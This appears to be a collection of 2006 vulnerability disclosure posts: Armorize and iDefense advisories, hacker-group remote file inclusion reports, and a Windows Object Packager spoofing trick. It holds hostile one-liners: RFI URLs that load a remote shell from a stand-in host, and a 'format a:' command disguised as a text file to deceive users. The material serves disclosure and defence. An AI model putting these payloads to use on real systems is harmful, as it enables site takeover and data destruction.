Spoofing security dialog in object packager - 2
A few months ago, I found that in all versions of windows xp are vulnerable: In object packager, if one created a command line, eg "format a: /X" and wanted to hide it, leave the icon and label to anything, really, and change the command line to 'cmd /c format a: /X > ..\security_log.txt'. It will appear as "security_log.txt" in the dialog, and will have the same icon, mime type, description, etc, as a normal text file, but if you were to open it, it would pipe the results of "format a: /X" to something that is probably called "C:\docume~1\%username%\security_log.txt".
Jinzora 2.6 - Remote File Include Vulnerabilities
# ERNE ERNEALiZM BU ASK BiTMEZ # Jinzora 2.6 - Remote File Include Vulnerabilities # site: Www.Hack-Medya.Org # Script : http://www.jinzora.com/downloads/j2.6.zip # Credits : ERNE # Contact : [EMAIL PROTECTED] # Thanks : Liz0zim, Bitter.Melish, D3ngsz, Rmx, Di_lejyoner, Xoron # Vulnerable : http://www.site.com/[path]/extras/mt.php?web_root=[shell]
Re: Multiple XSS Vulnerabilities in Zen Cart 1.3.5
Full Disclosure Armorize Technologies Security Advisory Advisory No: Armorize-ADV-2006-0003 Status: Full Date: 2006/9/27 Summary: Armorize-ADV-2006-0003 discloses multiple cross-site scripting vulnerabilities that are found in Zen Cart, which is a PHP e-commerce shopping program and is Built on a foundation of OScommerce GPL code. It provides an easy-to-setup and run online store. Affected Software: Zen Cart 1.3.5 Zen Cart 1.3.2 Vulnerability Description: Cross-Site Scripting Analysis/Impact: Privacy leakages from the client-side may lead to session hijacking, identity theft and information theft. Detection/Exploit(full): http://www.example.com/[PATH]/login.php POST variables admin_name and admin_pass are vulnerable. http://www.example.com/[PATH]/password_forgotten.php POST variable admin_email is vulnerable. Protection/Solution: 1. Escape every questionable URI and HTML script. 2. Remove prohibited user input. Disclosure Timeline: 2006/09/27 Published partial advisory; Notified vendor 2006/09/29 Received request from Ian Wilson of Zen Cart for more details 2006/10/02 Zen Cart released official patch for this vulnerability 2006/10/04 Published full advisory 2006/10/14 Full disclosure at SecurityFocus mailing list Credit: Security Team at Armorize Technologies, Inc. ([EMAIL PROTECTED]) Additional Information: Link to this Armorize advisory http://www.armorize.com/advisory.php?Keyword=Armorize-ADV-2006-0003 Links to all Armorize advisories http://www.armorize.com/advisory/ Links to Armorize vulnerability database http://www.armorize.com/resources/vulnerability.php Armorize Technologies is delivering the worlds most advanced source code analysis solution for Web application security based on its award-winning and patent-pending verification technologies. Addressing security early in the software development life cycle (SDLC), Armorize CodeSecure proactively identifies and traces vulnerabilities in Web application source code, effectively hardening websites against todays ever growing security threats. CodeSecures zero-false-positive accuracy, traceback support and Web 2.0-based interface make it the premium Web application security solution. For more information please visit: http://www.armorize.com.
WDT:- osTicket File Include all V
script:- osTicket Open Source Support Ticket System site:- http://www.osticket.com exploit by runvirus http://www.host/path/include/open_form.php?include_dir= welcome in www.sec-area.com
Re: Jax LinkLists Remote File include
this isnt a Vuln. because in admin/linklists.admin.php line 6, $pathtoscript = "../"; veriable is defined:) xoron
Re: Secunia Research: Microsoft Windows Object Packager Dialog Spoofing
I knew about this particular flaw for some time . (honestly I found it by accident, like I think the the security researcher from secunia did...or maybe it leaked from where I posted it?!?!?!!! :P). This could be a bit more critical if : 1) a '\' (not a '/') was placed at the end of the command line followed by an arbitrary name which could be eg. '\mypicture.bmp ' then at the object icon, a real bmp icon is set and the object name set to 'mypicture.bmp' so that the packager would precisely show only 'mypicture.bmp' at the warning msg n not a part of the command line as it would appear if a '/' was put instead of '\'. 2) renaming the .RTF file to .WRI, that would make the file be opened in wordpad since by default WRI files are opened in wordpad even with MS Word installed, and therefore not needing to embed a wordpad document in a word / powerpoint / excel and then less user interaction would be required. Plus if u embed a real picture in Wordpad it does NOT show the picture, it shows the default icon for that kind of image, eg. a bmp picture. MS Word, on the other hand shows the picture inside the document not an icon. well dont panic it is patched by now ;)
Re: DanPHPSupport => 0.5 Cross Site Scripting Vulnerabilities
This was fixed in DanPHPSupport 1.0
Multiple XSS Vulnerability in Gcontact
Armorize Technologies Security Advisory Advisory No: Armorize-ADV-2006-0005 Status: Partial Date: 2006/10/14 Summary: Armorize-ADV-2006-0005 discloses multiple cross-site scripting vulnerabilities that are found in Gcontact, which is a Web based address book written in Ajax/PHP offering multi-user, multi-contacts (email,phone,icq,msn,...) & multi-address for each person, birthday reminder by email, mailing-list management, Excel export, etc. Affected Software: Gcontact 0.6.5 Vulnerability Description: Cross-Site Scripting Analysis/Impact: Allows malicious users to access restricted directories and/or view data outside the normal scope which may lead to information theft and invasion of privacy. Detection/Exploit(partial): http://www.example.com/[PATH]/index.php Protection/Solution: 1. Escape every questionable URI and HTML script. 2. Remove prohibited user input. Credit: Security Team at Armorize Technologies, Inc. ([EMAIL PROTECTED]) Additional Information: Link to this Armorize advisory http://www.armorize.com/advisory.php?Keyword=Armorize-ADV-2006-0005 Links to all Armorize advisories http://www.armorize.com/advisory/ Links to Armorize vulnerability database http://www.armorize.com/resources/vulnerability.php Armorize Technologies is delivering the worlds most advanced source code analysis solution for Web application security based on its award-winning and patent-pending verification technologies. Addressing security early in the software development life cycle (SDLC), Armorize CodeSecure? proactively identifies and traces vulnerabilities in Web application source code, effectively hardening websites against todays ever growing security threats. CodeSecure?s zero-false-positive accuracy, traceback support and Web 2.0-based interface make it the premium Web application security solution. For more information please visit: http://www.armorize.com.
Re: iDefense Security Advisory 10.11.06: Sun Microsystems Solaris NSPR Library Arbitrary File Creation Vulnerability
On Wed, 11 Oct 2006, iDefense Labs wrote: III. ANALYSIS Exploitation allows local attackers to elevate privileges to root. http://www.0xdeadbeef.info/exploits/raptor_libnspr Oldschool style;) I'll probably code a universal exploit using /etc/ld.so.preload on next week... But now the week-end has landed! -- Marco Ivaldi Antifork Research, Inc. http://0xdeadbeef.info/ 3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707
EXlor 1.0 (/fonctions/template.php) Remote File Include Vulnerability
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=- EXlor 1.0 (/fonctions/template.php) Remote File Include Vulnerability -=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=- Source Code: http://www.comscripts.com/jump.php?action=script&id=1904 -=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=- Vulnerable File: /fonctions/template.php -=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=- Vulnerable Code:_ require ($repphp.'/cache/mot.cache.php'); -=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=- line:_ 21 -=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=- Exploit : http://www.test.com/[liver_dor]/fonctions/template.php?repphp=shell.txt? -=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=- Discoverd By : Mahmood_ali Conatact : HackEr_[at]w.cN -=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=- Special Greetings :_ Tryag-Team & Str0ke -=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=- _ Get today's hot entertainment gossip http://movies.msn.com/movies/hotgossip
@lex Guestbook <=(ModeliXe.php) Remote File Inclusion Exploit
#=== === [EMAIL PROTECTED] Guestbook <=(ModeliXe.php) Remote File Inclusion Exploit #=== #Bug in :ModeliXe.php # # #Vlu Code : # # #require_once($chem_modelixe.'Mxconf.php'); #require_once($chem_modelixe.'ErrorManager.php'); # # #=== = # #Exploit : # # #htpp://sitename.com/[scerpitPath]/templates/modelixe/Mxconf.php?chem_modelixe=http://SHELLURL.COM # # # #=== = #Discoverd By : MoHaNdKo # #Conatact : xp1o (at) msn (dot) com [email concealed] #or # # wWw.xP10.CoM & wWw.TRyaG.CoM # #Greetz : ( abo"ROOT SHELL " nora ) & 3abdalah & dr.7zn & mahmood_ali & ThE-WoLf-KsA & abu shad & v1per-haCker & MR.WOLF & # #abu melaf & mohagr22 & metoovet & fuck_net & hitler-jeddah & El3alMy & ToOoFA & Le CoPrA # #FaTaL & foz & elwa7sh elkasr & cRiMiNaL NeT # # and all member on xp10.com and tryag.com and lezr.com == vendor: http://www.alexphpteam.com/telecharger/alex_guestbook4.zip
iDefense Security Advisory 10.13.06: Apache HTTP Server mod_tcl set_var Format String Vulnerability
Apache HTTP Server mod_tcl set_var Format String Vulnerability iDefense Security Advisory 10.13.06 http://www.idefense.com/intelligence/vulnerabilities/ Oct 13, 2006 I. BACKGROUND The mod_tcl module for the Apache httpd v2.x is a scripting module that allows a TCL developer to create server side script pages in TCL. It is available as a contrib package for several distributions. For more information, see http://tcl.apache.org/ II. DESCRIPTION Remote exploitation of a format string vulnerability in the mod_tcl module for the Apache httpd v2.x could allow attackers to execute arbitrary code in the context of the httpd. Due to programmer error, user supplied data is passed as the format string specifier to several calls to an internally defined variable argument function. The function 'set_var' is declared as follows: mod_tcl.h:117:void set_var(Tcl_Interp *interp, char *var1, char *var2, const char *fmt, ...); Several insecure calls to this function are made through out the code, as seen below: tcl_cmds.c:437: set_var(interp, nm_var, (char*) key, (char*) val); tcl_cmds.c:2231:set_var(interp, nm_env, env[i], sptr + 1); tcl_core.c:650: set_var(interp, namespc, vl[i].var2, vl[i].var3); III. ANALYSIS Successful exploitation allows remote attackers to gain local access to the vulnerable system in the context of the affected httpd. To exploit this vulnerability, the attacker must know the location of at least one tcl server script that is configured to use this module for processing. IV. DETECTION iDefense has confirmed the existence of this vulnerability in version 1.0 of mod_tcl for Apache 2.x. V. WORKAROUND iDefense is currently unaware of any workarounds for this issue. VI. VENDOR RESPONSE The Apache mod_tcl team have addressed this vulnerability with mod_tcl version 1.0.1. It is available from http://tcl.apache.org/mod_tcl/ VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-4154 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 08/16/2006 Initial vendor notification 10/11/2006 Initial vendor response 10/13/2006 Coordinated public disclosure IX. CREDIT This vulnerability was discovered by Sparfell. Get paid for vulnerability research http://www.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.